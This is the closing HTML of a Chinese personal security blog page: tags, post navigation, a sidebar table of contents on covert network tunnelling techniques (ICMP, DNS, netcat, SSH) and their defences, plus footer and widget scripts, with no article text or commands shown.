          <div class="post-tags">
              <a href="/tags/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93/" rel="tag"># 隐藏通信隧道</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/02/04/Python%E8%87%AA%E5%AD%A6%E7%AC%94%E8%AE%B0/" rel="prev" title="Python自学笔记">
      <i class="fa fa-chevron-left"></i> Python自学笔记
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/02/24/%E5%9F%9F%E5%86%85%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E5%88%86%E6%9E%90%E5%8F%8A%E9%98%B2%E5%BE%A1/" rel="next" title="域内横向移动分析及防御">
      域内横向移动分析及防御 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">基础知识</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ICMP%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.1.</span> <span class="nav-text">ICMP协议</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TCP%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.2.</span> <span class="nav-text">TCP协议</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTTP%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.3.</span> <span class="nav-text">HTTP协议</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DNS%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.4.</span> <span class="nav-text">DNS协议</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF"><span class="nav-number">2.</span> <span class="nav-text">网络层隧道技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#IPv6%E9%9A%A7%E9%81%93"><span class="nav-number">2.1.</span> <span class="nav-text">IPv6隧道</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%80%E6%9C%AF%E7%AE%80%E4%BB%8B"><span class="nav-number">2.1.1.</span> <span class="nav-text">技术简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%96%B9%E6%B3%95"><span class="nav-number">2.1.2.</span> <span class="nav-text">防御方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ICMP%E9%9A%A7%E9%81%93"><span class="nav-number">2.2.</span> <span class="nav-text">ICMP隧道</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#icmpsh"><span class="nav-number">2.2.1.</span> <span class="nav-text">icmpsh</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PingTunnel"><span class="nav-number">2.2.2.</span> <span class="nav-text">*PingTunnel</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%96%B9%E6%B3%95-1"><span class="nav-number">2.2.3.</span> <span class="nav-text">防御方法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BC%A0%E8%BE%93%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF"><span class="nav-number">3.</span> <span class="nav-text">传输层隧道技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#lcx%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="nav-number">3.1.</span> <span class="nav-text">*lcx端口转发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#netcat"><span class="nav-number">3.2.</span> <span class="nav-text">*netcat</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PowerCat"><span class="nav-number">3.3.</span> <span class="nav-text">PowerCat</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BA%94%E7%94%A8%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF"><span class="nav-number">4.</span> <span class="nav-text">应用层隧道技术</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SSH%E5%8D%8F%E8%AE%AE"><span class="nav-number">4.1.</span> <span class="nav-text">SSH协议</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTTP-x2F-HTTPS"><span class="nav-number">4.2.</span> <span class="nav-text">HTTP&#x2F;HTTPS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DNS%E5%8D%8F%E8%AE%AE-1"><span class="nav-number">4.3.</span> <span class="nav-text">*DNS协议</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Spring"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Spring</p>
  <div class="site-description" itemprop="description">见到一座山，就想知道山后面是什么。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yourname" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yourname" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/qq_49502930" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_49502930" rel="noopener" target="_blank"><i class="crosshairs fa-fw"></i>CSDN</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Spring</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":"true#是否在手机端显示"},"log":false});</script></body>
</html>
